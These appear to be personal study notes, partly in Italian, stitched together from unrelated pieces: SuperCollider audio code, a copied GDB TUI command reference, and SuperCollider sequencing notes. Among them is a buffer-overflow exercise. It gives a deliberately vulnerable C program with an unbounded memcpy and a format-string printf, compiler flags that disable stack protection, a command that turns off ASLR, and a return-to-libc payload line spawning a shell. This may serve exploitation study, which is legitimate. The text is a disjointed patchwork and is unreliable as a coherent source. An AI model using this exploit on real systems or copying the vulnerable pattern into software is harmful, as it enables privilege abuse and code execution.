Reversing

s = Server.default.boot;

// create a new analyzer

FreqScope.new(400, 200, 0, server: s);

(
{
var carrier, modulator, carrfreq, modfreq;
carrfreq= MouseX.kr(440,5000,'exponential');
modfreq= MouseY.kr(1,5000,'exponential');
carrier= SinOsc.ar(carrfreq,0,0.5);
modulator= SinOsc.ar(modfreq,0,0.5);
carrier*modulator;
}.scope
)

25.4 TUI-specific Commands

The TUI has specific commands to control the text windows. These commands
are always available, even when GDB is not in the TUI mode. When GDB is in
the standard mode, most of these commands will automatically switch to
the TUI mode.

Note that if GDB’s stdout is not connected to a terminal, or GDB has been
started with the machine interface interpreter (see The GDB/MI Interface),
most of these commands will fail with an error, because it would not be
possible or desirable to enable curses window management.

info win
List and give the size of all displayed windows.

layout next
Display the next layout.

layout prev
Display the previous layout.

layout src
Display the source window only.

layout asm
Display the assembly window only.

layout split
Display the source and assembly window.

layout regs
Display the register window together with the source or assembly window.

focus next
Make the next window active for scrolling.

focus prev
Make the previous window active for scrolling.

focus src
Make the source window active for scrolling.

focus asm
Make the assembly window active for scrolling.

focus regs
Make the register window active for scrolling.

focus cmd
Make the command window active for scrolling.

refresh
Refresh the screen. This is similar to typing C-L.

tui reg float
Show the floating point registers in the register window.

tui reg general
Show the general registers in the register window.

tui reg next
Show the next register group. The list of register groups as well as their
order is target specific. The predefined register groups are the following:
general, float, system, vector, all, save, restore.

tui reg system
Show the system registers in the register window.

update
Update the source window and the current execution point.

winheight name +count
winheight name -count
Change the height of the window name by count lines. Positive counts increase
the height, while negative counts decrease it.

tabset nchars
Set the width of tab stops to be nchars characters.

uscendo dalla shell si va in segmentation fault perchè come ret c'è AAAA

gcc -m32 -o getenv ./getenv.c

gcc -m32 -fno-stack-protector -z execstack -o vuln ./vuln.c
sudo echo 0 > /proc/sys/kernel/randomize_va_space

vuln.c

#include <stdio.h>

int main(int argc, char *argv[])

{
char buf[256];
memcpy(buf, argv[1],strlen(argv[1]));
printf(buf);

}

getenv.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
        char *ptr;
        if(argc < 3) {
                printf("Usage: %s <environment var> <target program name>\n", argv[0]);
                exit(0);
        }

        ptr = getenv(argv[1]); /* Get env var location. */
        ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* Adjust for program name. */
        printf("%s will be at %p\n", argv[1], ptr);
}


export SHELL='/bin/sh'

------------------- GDB --------------------------


gdb ./vuln
b main
r
x/500s $esp
(per trovare l'indirizzo della SHELL)


mv getenv getv (stesso numero di caratteri di vuln)

./vuln $(python -c 'print "A"*268+"\x30\x6c\xe9\xf7"+"AAAA"+"\x3f\xd7\xff\xff"')
./getv SHELL ./vuln


documento pdf

si definisce prima una SynthDef chiamata bz che crea un suono sinusoidale stereo a 80Hz di frequenza
poi con il Pbind come nel secondo caso si crea una sequenza di degree (convertiti in frequenza) usando la nona ottava, ogni nota dura 0.1 e ha una amp di 0.05

per quanto riguarda lo Routine, si definisce un'insieme di comandi che vengono poi chiamati in sequenza dalla direttiva r.next, difatto un metodo della routine r;